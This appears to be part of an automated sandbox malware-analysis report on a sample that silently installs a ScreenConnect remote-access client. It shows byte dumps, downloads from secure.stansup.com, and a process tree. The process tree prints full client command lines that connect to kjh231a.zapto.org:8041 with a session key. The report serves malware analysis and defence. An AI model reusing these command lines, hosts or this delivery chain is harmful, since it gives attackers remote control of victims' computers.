                                                                                                                                                                                                                                                      2024-10-25 17:27:37 UTC16384INData Raw: 6e 49 6e 66 6f 73 3e 62 5f 5f 32 38 5f 31 00 3c 3e 39 5f 5f 38 5f 31 00 3c 50 6f 70 75 6c 61 74 65 43 6f 6e 74 65 78 74 4d 65 6e 75 53 74 72 69 70 49 74 65 6d 73 3e 62 5f 5f 38 5f 31 00 3c 3e 63 5f 5f 44 69 73 70 6c 61 79 43 6c 61 73 73 31 35 39 5f 31 00 55 53 45 52 5f 49 4e 46 4f 5f 31 00 3c 52 65 70 6c 61 63 65 57 6e 64 50 72 6f 63 3e 62 5f 5f 31 00 3c 52 75 6e 43 6f 6d 6d 61 6e 64 4c 69 6e 65 50 72 6f 67 72 61 6d 3e 62 5f 5f 31 00 3c 47 65 74 44 65 73 6b 74 6f 70 57 69 6e 64 6f 77 48 61 6e 64 6c 65 73 3e 62 5f 5f 31 00 3c 47 65 74 57 69 6e 64 6f 77 48 61 6e 64 6c 65 73 3e 62 5f 5f 31 00 3c 47 65 74 44 65 73 63 65 6e 64 65 6e 74 57 69 6e 64 6f 77 48 61 6e 64 6c 65 73 3e 62 5f 5f 31 00 3c 47 65 74 57 69 6e 64 6f 77 53 74 61 74 69 6f 6e 4e 61 6d 65 73 3e
                                                                                                                                                                                                                                                      Data Ascii: nInfos>b__28_1<>9__8_1<PopulateContextMenuStripItems>b__8_1<>c__DisplayClass159_1USER_INFO_1<ReplaceWndProc>b__1<RunCommandLineProgram>b__1<GetDesktopWindowHandles>b__1<GetWindowHandles>b__1<GetDescendentWindowHandles>b__1<GetWindowStationNames>
                                                                                                                                                                                                                                                      2024-10-25 17:27:37 UTC16384INData Raw: 6c 65 00 4d 6f 76 65 46 69 6c 65 00 70 43 6f 6e 66 69 67 46 69 6c 65 00 54 72 79 55 6e 62 6c 6f 63 6b 46 69 6c 65 00 4c 6f 61 64 52 65 73 6f 75 72 63 65 50 61 63 6b 46 72 6f 6d 46 69 6c 65 00 4d 61 70 46 69 6c 65 00 70 48 65 6c 70 46 69 6c 65 00 70 4f 75 74 70 75 74 46 69 6c 65 00 70 73 7a 46 69 6c 65 00 43 72 65 61 74 65 50 72 6f 66 69 6c 65 00 44 65 6c 65 74 65 50 72 6f 66 69 6c 65 00 75 73 72 69 34 5f 70 72 6f 66 69 6c 65 00 70 70 66 69 6c 65 00 45 52 6f 6c 65 00 72 6f 6c 65 00 41 6c 6c 6f 63 43 6f 6e 73 6f 6c 65 00 46 72 65 65 43 6f 6e 73 6f 6c 65 00 77 42 69 74 73 50 65 72 53 61 6d 70 6c 65 00 6c 70 54 69 74 6c 65 00 41 64 64 41 63 63 65 73 73 52 75 6c 65 00 46 69 6c 65 53 79 73 74 65 6d 41 63 63 65 73 73 52 75 6c 65 00 53 65 74 41 63 63 65 73 73 52
                                                                                                                                                                                                                                                      Data Ascii: leMoveFilepConfigFileTryUnblockFileLoadResourcePackFromFileMapFilepHelpFilepOutputFilepszFileCreateProfileDeleteProfileusri4_profileppfileERoleroleAllocConsoleFreeConsolewBitsPerSamplelpTitleAddAccessRuleFileSystemAccessRuleSetAccessR
                                                                                                                                                                                                                                                      2024-10-25 17:27:38 UTC16384INData Raw: 4c 61 73 74 41 63 74 69 76 65 50 6f 70 75 70 00 41 70 70 44 6f 6d 61 69 6e 53 65 74 75 70 00 70 73 7a 56 65 6e 64 6f 72 53 65 74 75 70 00 66 43 6f 6e 74 65 78 74 52 65 71 00 53 79 73 74 65 6d 2e 4c 69 6e 71 00 50 72 6f 70 56 61 72 69 61 6e 74 43 6c 65 61 72 00 45 6e 73 75 72 65 53 74 61 72 74 73 57 69 74 68 43 68 61 72 00 43 6f 6e 76 65 72 74 42 6f 74 68 53 6c 61 73 68 65 73 54 6f 43 68 61 72 00 44 69 72 65 63 74 6f 72 79 53 65 70 61 72 61 74 6f 72 43 68 61 72 00 70 72 6f 70 76 61 72 00 65 5f 63 70 61 72 68 64 72 00 49 73 4d 65 6d 62 65 72 00 6d 61 67 69 63 4e 75 6d 62 65 72 00 64 77 42 75 69 6c 64 4e 75 6d 62 65 72 00 46 69 6c 65 48 65 61 64 65 72 00 77 61 76 65 49 6e 50 72 65 70 61 72 65 48 65 61 64 65 72 00 77 61 76 65 4f 75 74 50 72 65 70 61 72 65 48
                                                                                                                                                                                                                                                      Data Ascii: LastActivePopupAppDomainSetuppszVendorSetupfContextReqSystem.LinqPropVariantClearEnsureStartsWithCharConvertBothSlashesToCharDirectorySeparatorCharpropvare_cparhdrIsMembermagicNumberdwBuildNumberFileHeaderwaveInPrepareHeaderwaveOutPrepareH
                                                                                                                                                                                                                                                      2024-10-25 17:27:38 UTC16384INData Raw: 6c 79 00 70 6f 69 6e 74 6c 79 00 53 65 6c 65 63 74 4d 61 6e 79 00 53 68 75 74 64 6f 77 6e 42 6c 6f 63 6b 52 65 61 73 6f 6e 44 65 73 74 72 6f 79 00 42 6c 6f 63 6b 43 6f 70 79 00 61 6c 6c 6f 77 43 6f 70 79 00 65 6e 74 72 6f 70 79 00 54 72 79 00 54 6f 6b 65 6e 50 72 69 6d 61 72 79 00 54 6f 44 69 63 74 69 6f 6e 61 72 79 00 4c 6f 61 64 4c 69 62 72 61 72 79 00 46 72 65 65 4c 69 62 72 61 72 79 00 49 4e 61 74 69 76 65 4c 69 62 72 61 72 79 00 54 72 79 4c 6f 61 64 4e 61 74 69 76 65 4c 69 62 72 61 72 79 00 54 72 79 46 72 65 65 4e 61 74 69 76 65 4c 69 62 72 61 72 79 00 57 69 6e 64 6f 77 73 44 69 73 6b 4e 61 74 69 76 65 4c 69 62 72 61 72 79 00 57 69 6e 64 6f 77 73 4d 65 6d 6f 72 79 4e 61 74 69 76 65 4c 69 62 72 61 72 79 00 4f 62 6a 65 63 74 51 75 65 72 79 00 53 65 6c
                                                                                                                                                                                                                                                      Data Ascii: lypointlySelectManyShutdownBlockReasonDestroyBlockCopyallowCopyentropyTryTokenPrimaryToDictionaryLoadLibraryFreeLibraryINativeLibraryTryLoadNativeLibraryTryFreeNativeLibraryWindowsDiskNativeLibraryWindowsMemoryNativeLibraryObjectQuerySel


Session ID: 10
Source IP: 192.168.2.10
Source Port: 49728
Destination IP: 79.110.49.185
Destination Port: 443
PID: 7740
Process: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp: 2024-10-25 17:27:42 UTC
Bytes transferred: 102
Direction: OUT
Data:
GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1
Host: secure.stansup.com
Accept-Encoding: gzip

Timestamp: 2024-10-25 17:27:43 UTC
Bytes transferred: 215
Direction: IN
Data:
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 68096
Content-Type: text/html
Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
Date: Fri, 25 Oct 2024 17:27:42 GMT
Connection: close


Session ID: 11
Source IP: 192.168.2.10
Source Port: 49729
Destination IP: 79.110.49.185
Destination Port: 443
PID: 7740
Process: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp: 2024-10-25 17:27:44 UTC
Bytes transferred: 93
Direction: OUT
Data:
GET /Bin/ScreenConnect.Core.dll HTTP/1.1
Host: secure.stansup.com
Accept-Encoding: gzip

Timestamp: 2024-10-25 17:27:44 UTC
Bytes transferred: 216
Direction: IN
Data:
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 548352
Content-Type: text/html
Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
Date: Fri, 25 Oct 2024 17:27:43 GMT
Connection: close
                                                                                                                                                                                                                                                      Data Ascii: oo(o(o-,o*29(<};}<}=}>}?*{;*{<*{=*{>*{?*0G*~-:~(,~-(d(<(o(-~*':
                                                                                                                                                                                                                                                      2024-10-25 17:27:45 UTC16384INData Raw: 1a 73 6a 01 00 0a 7a 1e 02 28 3c 00 00 0a 2a 2e 73 a5 0d 00 06 80 30 05 00 04 2a 1e 02 28 3c 00 00 0a 2a 32 02 7b 31 05 00 04 6f 42 01 00 06 2a 1e 02 28 3c 00 00 0a 2a 36 03 02 7b 7f 01 00 0a 6f 7b 01 00 0a 2a 1e 02 28 3c 00 00 0a 2a 36 03 02 7b 88 01 00 0a 6f 7b 01 00 0a 2a 2e 73 ae 0d 00 06 80 36 05 00 04 2a 1e 02 28 3c 00 00 0a 2a 22 03 04 28 56 02 00 06 2a 22 03 04 28 5c 02 00 06 2a 1e 02 28 3c 00 00 0a 2a 00 00 13 30 03 00 1d 00 00 00 b0 01 00 11 02 7b 39 05 00 04 03 16 28 ef 01 00 2b 0a 12 00 1f 64 28 7a 08 00 0a 6f 2f 02 00 06 2a 00 00 00 13 30 03 00 1b 00 00 00 b1 01 00 11 02 7b 39 05 00 04 03 16 28 f0 01 00 2b 0a 12 00 28 7b 08 00 0a 6f 31 02 00 06 2a 36 02 7b 39 05 00 04 03 6f 33 02 00 06 2a 00 00 00 13 30 02 00 1a 00 00 00 b2 01 00 11 02 7b 39
                                                                                                                                                                                                                                                      Data Ascii: sjz(<*.s0*(<*2{1oB*(<*6{o{*(<*6{o{*.s6*(<*"(V*"(\*(<*0{9(+d(zo/*0{9(+({o1*6{9o3*0{9
                                                                                                                                                                                                                                                      2024-10-25 17:27:45 UTC16384INData Raw: 02 7b 23 05 00 0a 28 31 0a 00 0a 2a 1e 02 28 3c 00 00 0a 2a 4a 02 7b 27 05 00 0a 02 7b 28 05 00 0a 28 31 0a 00 0a 2a 2e 73 04 10 00 06 80 23 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 1e 03 6f 1b 07 00 06 2a 1e 03 6f 43 00 00 0a 2a 2e 73 08 10 00 06 80 26 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 1e 03 6f 43 00 00 0a 2a 2e 73 0b 10 00 06 80 28 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 22 0f 01 28 4b 0b 00 06 2a 3a 0f 01 fe 16 4b 01 00 02 6f 43 00 00 0a 2a 2e 73 0f 10 00 06 80 2b 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 3a 0f 01 fe 16 c1 00 00 02 6f 43 00 00 0a 2a 1e 02 28 3c 00 00 0a 2a 2e 73 13 10 00 06 80 32 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 36 03 03 28 1a 02 00 2b 73 32 0a 00 0a 2a 2a 03 6f 33 0a 00 0a 14 fe 03 2a 5e 03 03 6f 34 0a 00 0a 28 bc 01 00 2b 28 f8 0b 00 06 73 35
                                                                                                                                                                                                                                                      Data Ascii: {#(1*(<*J{'{((1*.s#*(<*o*oC*.s&*(<*oC*.s(*(<*"(K*:KoC*.s+*(<*:oC*(<*.s2*(<*6(+s2**o3*^o4(+(s5
                                                                                                                                                                                                                                                      2024-10-25 17:27:45 UTC16384INData Raw: 27 3d 01 00 6d 00 9a 01 fe 02 09 01 10 00 e6 4f 01 00 27 3d 01 00 6d 00 9e 01 06 03 09 01 10 00 d9 bb 00 00 27 3d 01 00 6d 00 a0 01 14 03 09 01 10 00 96 3a 01 00 27 3d 01 00 6d 00 a2 01 1f 03 09 01 10 00 9c ff 00 00 27 3d 01 00 6d 00 a6 01 46 03 81 01 10 00 cc 3a 01 00 27 3d 01 00 35 00 a9 01 5a 03 01 20 10 00 0e e3 00 00 27 3d 01 00 35 00 ab 01 63 03 01 20 10 00 4d 34 01 00 27 3d 01 00 35 00 ae 01 7b 03 01 00 10 00 e9 7f 00 00 27 3d 01 00 35 00 b1 01 80 03 81 00 10 00 cf fc 00 00 27 3d 01 00 3c 03 b2 01 8a 03 01 00 10 00 8d fe 00 00 27 3d 01 00 24 03 b4 01 95 03 01 00 10 00 96 fd 00 00 27 3d 01 00 24 03 b6 01 99 03 01 00 10 00 fa 7f 00 00 27 3d 01 00 35 00 b6 01 9d 03 01 00 10 00 56 91 00 00 27 3d 01 00 35 00 b7 01 a7 03 01 00 10 00 47 91 00 00 27 3d 01
                                                                                                                                                                                                                                                      Data Ascii: '=mO'=m'=m:'=m'=mF:'=5Z '=5c M4'=5{'=5'=<'=$'=$'=5V'=5G'=


Session ID:12
Source IP:192.168.2.10
Source Port:49730
Destination IP:79.110.49.185
Destination Port:443
PID:7740
Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp:2024-10-25 17:27:48 UTC
Bytes transferred:102
Direction:OUT
Data:
GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1
Host: secure.stansup.com
Accept-Encoding: gzip

Timestamp:2024-10-25 17:27:48 UTC
Bytes transferred:216
Direction:IN
Data:
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 600864
Content-Type: text/html
Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
Date: Fri, 25 Oct 2024 17:27:47 GMT
Connection: close



                                                                                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                                                                                      Start time:13:27:12
                                                                                                                                                                                                                                                      Start date:25/10/2024
                                                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\Qjq85KfhBC.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\Qjq85KfhBC.exe"
                                                                                                                                                                                                                                                      Imagebase:0x910000
                                                                                                                                                                                                                                                      File size:83'368 bytes
                                                                                                                                                                                                                                                      MD5 hash:FDB2A84FFCB57C0BFBBF0AADB9BAD790
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:1
                                                                                                                                                                                                                                                      Start time:13:27:12
                                                                                                                                                                                                                                                      Start date:25/10/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
                                                                                                                                                                                                                                                      Imagebase:0x21cce550000
                                                                                                                                                                                                                                                      File size:24'856 bytes
                                                                                                                                                                                                                                                      MD5 hash:B4088F44B80D363902E11F897A7BAC09
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000001.00000002.2221493797.0000021CD051A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:3
                                                                                                                                                                                                                                                      Start time:13:27:13
                                                                                                                                                                                                                                                      Start date:25/10/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                                                                                                      Imagebase:0x7ff7df220000
                                                                                                                                                                                                                                                      File size:55'320 bytes
                                                                                                                                                                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:4
                                                                                                                                                                                                                                                      Start time:13:27:13
                                                                                                                                                                                                                                                      Start date:25/10/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 7648 -ip 7648
                                                                                                                                                                                                                                                      Imagebase:0xef0000
                                                                                                                                                                                                                                                      File size:483'680 bytes
                                                                                                                                                                                                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:6
                                                                                                                                                                                                                                                      Start time:13:27:13
                                                                                                                                                                                                                                                      Start date:25/10/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7648 -s 748
                                                                                                                                                                                                                                                      Imagebase:0xef0000
                                                                                                                                                                                                                                                      File size:483'680 bytes
                                                                                                                                                                                                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:7
                                                                                                                                                                                                                                                      Start time:13:27:13
                                                                                                                                                                                                                                                      Start date:25/10/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                                      Imagebase:0x7ff7df220000
                                                                                                                                                                                                                                                      File size:55'320 bytes
                                                                                                                                                                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                      Target ID:8
                                                                                                                                                                                                                                                      Start time:13:27:15
                                                                                                                                                                                                                                                      Start date:25/10/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                                                                                                                      Imagebase:0x7ff7df220000
                                                                                                                                                                                                                                                      File size:55'320 bytes
                                                                                                                                                                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                      Target ID:10
                                                                                                                                                                                                                                                      Start time:13:27:51
                                                                                                                                                                                                                                                      Start date:25/10/2024
                                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe"
                                                                                                                                                                                                                                                      Imagebase:0xf70000
                                                                                                                                                                                                                                                      File size:600'864 bytes
                                                                                                                                                                                                                                                      MD5 hash:D95CC7E6F8EC5DDE28E1EFFA58E7AC8D
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 0000000A.00000000.1741616097.0000000000F72000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 0000000A.00000002.1754297358.000000000328F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:11
                                                                                                                                                                                                                                                      Start time:13:27:52
                                                                                                                                                                                                                                                      Start date:25/10/2024
                                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=%2f&i=Untitled%20Session" "1"
                                                                                                                                                                                                                                                      Imagebase:0x110000
                                                                                                                                                                                                                                                      File size:95'520 bytes
                                                                                                                                                                                                                                                      MD5 hash:200A917996F0FC74879076354454473A
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:12
Start time:13:27:52
Start date:25/10/2024
Path:C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=%2f&i=Untitled%20Session" "1"
Imagebase:0x110000
File size:95'520 bytes
MD5 hash:200A917996F0FC74879076354454473A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:13
Start time:13:27:53
Start date:25/10/2024
Path:C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
Wow64 process (32bit):false
Commandline:"C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe" "RunRole" "bd7f42b5-0144-4d3f-871e-9605118ce260" "User"
Imagebase:0x70000
File size:600'864 bytes
MD5 hash:D95CC7E6F8EC5DDE28E1EFFA58E7AC8D
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Execution Graph

Execution Coverage:2.2%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:3.8%
Total number of Nodes:1464
Total number of Limit Nodes:4
914869 _free 15 API calls 5394->5400 5433 916176 5395->5433 5396 9165e3 5396->5391 5402 914869 15 API calls _free 5396->5402 5397->5378 5398->5371 5399->5389 5404 916572 5399->5404 5400->5403 5402->5396 5445 91667a 5403->5445 5404->5386 5406 916172 5405->5406 5407 916089 5405->5407 5406->5399 5408 91609a 5407->5408 5409 914869 _free 15 API calls 5407->5409 5410 9160ac 5408->5410 5412 914869 _free 15 API calls 5408->5412 5409->5408 5411 9160be 5410->5411 5413 914869 _free 15 API calls 5410->5413 5414 9160d0 5411->5414 5415 914869 _free 15 API calls 5411->5415 5412->5410 5413->5411 5416 9160e2 5414->5416 5417 914869 _free 15 API calls 5414->5417 5415->5414 5418 9160f4 5416->5418 5420 914869 _free 15 API calls 5416->5420 5417->5416 5419 916106 5418->5419 5421 914869 _free 15 API calls 5418->5421 5422 916118 5419->5422 5423 914869 _free 15 API calls 5419->5423 5420->5418 5421->5419 5424 91612a 5422->5424 5425 914869 _free 15 API calls 5422->5425 5423->5422 5426 91613c 5424->5426 5428 914869 _free 15 API calls 5424->5428 5425->5424 5427 91614e 5426->5427 5429 914869 _free 15 API calls 5426->5429 5430 916160 5427->5430 5431 914869 _free 15 API calls 5427->5431 5428->5426 5429->5427 5430->5406 5432 914869 _free 15 API calls 5430->5432 5431->5430 5432->5406 5434 916183 5433->5434 5444 9161db 5433->5444 5435 914869 _free 15 API calls 5434->5435 5438 916193 5434->5438 5435->5438 5436 9161a5 5437 9161b7 5436->5437 5440 914869 _free 15 API calls 5436->5440 5441 9161c9 5437->5441 5442 914869 _free 15 API calls 5437->5442 5438->5436 5439 914869 _free 15 API calls 5438->5439 5439->5436 5440->5437 5443 914869 _free 15 API calls 5441->5443 5441->5444 5442->5441 5443->5444 5444->5404 5446 916687 5445->5446 5450 9166a5 5445->5450 5447 91621b __fassign 15 API calls 5446->5447 5446->5450 5448 91669f 5447->5448 5449 914869 _free 15 API calls 5448->5449 5449->5450 5450->5396 5451->5376 5484 916a82 5452->5484 5455 916b6f 5456 916b7b _abort 5455->5456 5460 916ba8 _abort 5456->5460 5463 
916ba2 _abort 5456->5463 5498 9144a8 GetLastError 5456->5498 5458 916bf4 5459 9147f9 _free 15 API calls 5458->5459 5461 916bf9 5459->5461 5462 916c20 5460->5462 5520 9156e2 EnterCriticalSection 5460->5520 5517 91473d 5461->5517 5467 916c7f 5462->5467 5469 916c77 5462->5469 5477 916caa 5462->5477 5521 91572a LeaveCriticalSection 5462->5521 5463->5458 5463->5460 5466 916bd7 _abort 5463->5466 5466->5309 5467->5477 5522 916b66 5467->5522 5472 913793 _abort 23 API calls 5469->5472 5472->5467 5474 914424 _abort 33 API calls 5478 916d0d 5474->5478 5476 916b66 _abort 33 API calls 5476->5477 5525 916d2f 5477->5525 5478->5466 5479 914424 _abort 33 API calls 5478->5479 5479->5466 5481 91458f _abort 5480->5481 5482 9145bb IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 5481->5482 5483 91468c _abort _ValidateLocalCookies 5482->5483 5483->5310 5487 916a28 5484->5487 5486 913f29 5486->5309 5486->5455 5488 916a34 ___scrt_is_nonwritable_in_current_image 5487->5488 5493 9156e2 EnterCriticalSection 5488->5493 5490 916a42 5494 916a76 5490->5494 5492 916a69 _abort 5492->5486 5493->5490 5497 91572a LeaveCriticalSection 5494->5497 5496 916a80 5496->5492 5497->5496 5499 9144c1 5498->5499 5500 9144c7 5498->5500 5502 915904 _abort 6 API calls 5499->5502 5501 91480c _abort 12 API calls 5500->5501 5505 91451e SetLastError 5500->5505 5503 9144d9 5501->5503 5502->5500 5504 9144e1 5503->5504 5507 91595a _abort 6 API calls 5503->5507 5508 914869 _free 12 API calls 5504->5508 5506 914527 5505->5506 5506->5463 5509 9144f6 5507->5509 5510 9144e7 5508->5510 5509->5504 5511 9144fd 5509->5511 5512 914515 SetLastError 5510->5512 5513 914296 _abort 12 API calls 5511->5513 5512->5506 5514 914508 5513->5514 5515 914869 _free 12 API calls 5514->5515 5516 91450e 5515->5516 5516->5505 5516->5512 5529 9146c2 5517->5529 5519 914749 5519->5466 5520->5462 5521->5469 5523 914424 _abort 33 API calls 5522->5523 5524 916b6b 5523->5524 5524->5476 5526 916d35 5525->5526 5527 916cfe 5525->5527 
